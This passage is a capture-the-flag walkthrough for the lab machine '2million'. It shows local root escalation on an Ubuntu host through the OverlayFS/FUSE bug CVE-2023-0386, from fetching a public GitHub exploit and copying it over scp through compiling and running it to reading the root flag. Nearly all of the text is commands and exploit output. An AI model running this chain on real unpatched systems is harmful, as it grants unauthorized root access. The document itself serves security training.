Codename: jammyGoogle search OverlayFS FUSE exploit site:github.com
https://github.com/xkaneiki/CVE-2023-0386
git clone https://github.com/xkaneiki/CVE-2023-0386.git
zip -r exploit.zip CVE-2023-0386
scp exploit.zip admin@2million.htb:/tmpadmin@2million:~$ cd /tmp
admin@2million:/tmp$ ls -la
total 524
drwxrwxrwt 15 root root 4096 Jun 27 00:02 .
drwxr-xr-x 19 root root 4096 Jun 6 2023 ..
-rw-rw-r-- 1 admin admin 471232 Jun 27 00:02 exploit.zip
drwxrwxrwt 2 root root 4096 Jun 26 10:01 .font-unix
drwxrwxrwt 2 root root 4096 Jun 26 10:01 .ICE-unix
drwx------ 3 root root 4096 Jun 26 10:01 snap-private-tmp
drwx------ 3 root root 4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-memcached.service-DaQ8TV
drwx------ 3 root root 4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-ModemManager.service-v7mulI
drwx------ 3 root root 4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-systemd-logind.service-9PRvZS
drwx------ 3 root root 4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-systemd-resolved.service-9oYHqF
drwx------ 3 root root 4096 Jun 26 10:01 systemd-private-c23e74febee34d52b47c9af48c95cad6-systemd-timesyncd.service-9alo7E
drwx------ 3 root root 4096 Jun 26 20:42 systemd-private-c23e74febee34d52b47c9af48c95cad6-upower.service-IrHFVI
drwxrwxrwt 2 root root 4096 Jun 26 10:01 .Test-unix
drwx------ 2 root root 4096 Jun 26 10:06 vmware-root_617-4022243191
drwxrwxrwt 2 root root 4096 Jun 26 10:01 .X11-unix
drwxrwxrwt 2 root root 4096 Jun 26 10:01 .XIM-unix
admin@2million:/tmp$ cd CVE-2023-0386/
admin@2million:/tmp/CVE-2023-0386$ make all
gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -static -pthread -lfuse -ldl
fuse.c: In function ‘read_buf_callback’:
fuse.c:106:21: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘off_t’ {aka ‘long int’} [-Wformat=]
106 | printf("offset %d\n", off);
| ~^ ~~~
| | |
| int off_t {aka long int}
| %ld
fuse.c:107:19: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘size_t’ {aka ‘long unsigned int’} [-Wformat=]
107 | printf("size %d\n", size);
| ~^ ~~~~
| | |
| int size_t {aka long unsigned int}
| %ld
fuse.c: In function ‘main’:
fuse.c:214:12: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
214 | while (read(fd, content + clen, 1) > 0)
| ^~~~
| fread
fuse.c:216:5: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
216 | close(fd);
| ^~~~~
| pclose
fuse.c:221:5: warning: implicit declaration of function ‘rmdir’ [-Wimplicit-function-declaration]
221 | rmdir(mount_path);
| ^~~~~
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/libfuse.a(fuse.o): in function `fuse_new_common':
(.text+0xaf4e): warning: Using 'dlopen' in statically linked applications requires at runtime the shared libraries from the glibc version used for linking
gcc -o exp exp.c -lcap
gcc -o gc getshell.c
admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc &
[1] 5582
admin@2million:/tmp/CVE-2023-0386$ [+] len of gc: 0x3ee0
./exp
uid:1000 gid:1000
[+] mount success
[+] readdir
[+] getattr_callback
/file
total 8
drwxrwxr-x 1 root root 4096 Jun 27 00:08 .
drwxrwxr-x 6 root root 4096 Jun 27 00:08 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan 1 1970 file
[+] open_callback
/file
[+] read buf callback
offset 0
size 16384
path /file
[+] open_callback
/file
[+] open_callback
/file
[+] ioctl callback
path /file
cmd 0x80086601
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@2million:/tmp/CVE-2023-0386# cd /root
root@2million:/root# ls
root.txt snap thank_you.json
root@2million:/root# cat root.txt
6916************************b789Last updated